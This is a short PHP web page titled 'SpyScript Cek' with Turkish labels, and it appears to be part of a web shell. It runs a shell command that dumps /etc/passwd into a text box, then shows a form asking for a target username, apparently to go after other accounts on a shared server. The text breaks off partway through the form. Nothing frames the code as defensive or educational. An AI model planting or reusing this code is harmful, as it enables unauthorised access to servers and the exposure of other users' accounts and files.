<center>
<title>SpyScript Cek</title>
<form method="post" action="">
<?php $passwd=shell_exec("cat /etc/passwd"); echo "<textarea cols='85' rows='17'>"; echo $passwd."\n"; echo "</textarea>"; ?>
<br>Hedef Username (ex:shellerim) : <br><input type="text" name="user"><br>
<input type="submit"...